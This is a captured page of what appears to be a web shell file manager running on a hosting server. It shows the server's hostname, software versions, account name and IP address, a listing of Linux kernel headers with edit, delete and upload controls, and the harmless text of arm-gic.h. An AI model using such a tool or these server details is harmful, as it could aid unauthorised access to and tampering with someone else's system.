[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.19
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
usr
/
src
/
kernels
/
4.18.0-553.64.1.el8_10.x86_64
/
include
/
dt-bindings
/
interrupt-controller
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 arm-gic.h
529 B
SET
[ EDIT ]
|
[ DEL ]
📄 irq-st.h
859 B
SET
[ EDIT ]
|
[ DEL ]
📄 irq.h
604 B
SET
[ EDIT ]
|
[ DEL ]
📄 mips-gic.h
246 B
SET
[ EDIT ]
|
[ DEL ]
📄 mvebu-icu.h
357 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: arm-gic.h
/* SPDX-License-Identifier: GPL-2.0 */ /* * This header provides constants for the ARM GIC. */ #ifndef _DT_BINDINGS_INTERRUPT_CONTROLLER_ARM_GIC_H #define _DT_BINDINGS_INTERRUPT_CONTROLLER_ARM_GIC_H #include <dt-bindings/interrupt-controller/irq.h> /* interrupt specifier cell 0 */ #define GIC_SPI 0 #define GIC_PPI 1 /* * Interrupt specifier cell 2. * The flags in irq.h are valid, plus those below. */ #define GIC_CPU_MASK_RAW(x) ((x) << 8) #define GIC_CPU_MASK_SIMPLE(num) GIC_CPU_MASK_RAW((1 << (num)) - 1) #endif